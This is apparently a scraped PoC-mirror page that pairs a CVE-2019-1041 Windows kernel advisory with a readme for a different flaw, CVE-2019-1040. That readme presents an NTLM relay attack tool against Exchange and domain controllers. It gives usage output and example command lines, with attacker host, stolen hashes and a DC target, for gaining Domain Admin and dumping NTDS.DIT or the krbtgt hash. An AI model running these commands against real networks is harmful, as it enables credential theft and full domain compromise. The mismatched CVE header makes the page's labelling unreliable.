CVE-2019-1041 PoC — Windows Kernel Elevation of Privilege Vulnerability

Source

https://github.com/5l1v3r1/CVE-2019-1041

Associated Vulnerability

Title:Windows Kernel Elevation of Privilege Vulnerability (CVE-2019-1041)
Description:An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system. The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.

Readme

# CVE-2019-1040

Great writeup! [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) .

So, I wrote CVE-2019-1040.py for easy to use.

You can also check out my exchange2domain repo: https://github.com/ridter/exchange2domain, another way to use exchange to get DC.

## Requirements
These tools require [impacket](https://github.com/SecureAuthCorp/impacket). You can install it from pip with `pip install impacket`.

## Usage
```
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                        [--hashes HASHES] [--smb-port [destination port]] -ah
                        ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
                        [-t TIMEOUT]
                        [--exec-method [{smbexec,wmiexec,mmcexec}]]
                        [--just-dc-user USERNAME] [--debug]
                        EX_HOSTNAME

CVE-2019-1040 with Exchange

positional arguments:
  EX_HOSTNAME           Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -t TIMEOUT, --timeout TIMEOUT
                        timeout in seconds
  --exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output
```

example:
```
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip 
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip 
```


If you only want to dump `krbtgt`, use `--just-dc-user`.

example:
```
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip  --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt
```

![](pics/1560509768227.jpg)

<p align="center"><strong>如果我的开源项目对你有所帮助，可以使用微信赞赏</strong></p>
<p align="center">
<img width="300" src="https://blogpics-1251691280.file.myqcloud.com/imgs/20190614190623.jpeg">
</p>

File Snapshot


 [4.0K]  /data/pocs/e3a2274581dfc2d0c99d4abddfe0a1046c72118e
├── [4.0K]  comm
│   ├── [114K]  dump.py
│   ├── [   0]  __init__.py
│   ├── [ 997]  logger.py
│   ├── [4.0K]  ntlmrelayx
│   │   ├── [4.0K]  attacks
│   │   │   ├── [1.8K]  httpattack.py
│   │   │   ├── [3.7K]  imapattack.py
│   │   │   ├── [2.9K]  __init__.py
│   │   │   ├── [ 32K]  ldapattack.py
│   │   │   ├── [ 981]  mssqlattack.py
│   │   │   └── [5.7K]  smbattack.py
│   │   ├── [4.0K]  clients
│   │   │   ├── [4.8K]  httprelayclient.py
│   │   │   ├── [3.9K]  imaprelayclient.py
│   │   │   ├── [4.5K]  __init__.py
│   │   │   ├── [7.9K]  ldaprelayclient.py
│   │   │   ├── [5.6K]  mssqlrelayclient.py
│   │   │   ├── [ 22K]  smbrelayclient.py
│   │   │   └── [3.1K]  smtprelayclient.py
│   │   ├── [   5]  __init__.py
│   │   ├── [4.0K]  servers
│   │   │   ├── [ 16K]  httprelayserver.py
│   │   │   ├── [ 134]  __init__.py
│   │   │   ├── [ 32K]  smbrelayserver.py
│   │   │   ├── [4.0K]  socksplugins
│   │   │   │   ├── [8.1K]  http.py
│   │   │   │   ├── [1.9K]  https.py
│   │   │   │   ├── [9.4K]  imap.py
│   │   │   │   ├── [2.7K]  imaps.py
│   │   │   │   ├── [ 755]  __init__.py
│   │   │   │   ├── [9.1K]  mssql.py
│   │   │   │   ├── [ 26K]  smb.py
│   │   │   │   └── [6.8K]  smtp.py
│   │   │   └── [ 20K]  socksserver.py
│   │   └── [4.0K]  utils
│   │       ├── [4.3K]  config.py
│   │       ├── [2.5K]  enum.py
│   │       ├── [   5]  __init__.py
│   │       ├── [2.7K]  ssl.py
│   │       ├── [5.1K]  targetsutils.py
│   │       └── [1.0K]  tcpshell.py
│   ├── [ 13K]  restore.py
│   └── [7.2K]  secretsdump.py
├── [ 516]  config.py
├── [ 11K]  CVE-2019-1040.py
├── [1.0K]  LICENSE
├── [4.0K]  pics
│   └── [469K]  1560509768227.jpg
├── [3.0K]  README.md
└── [  31]  requirements.txt

8 directories, 43 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!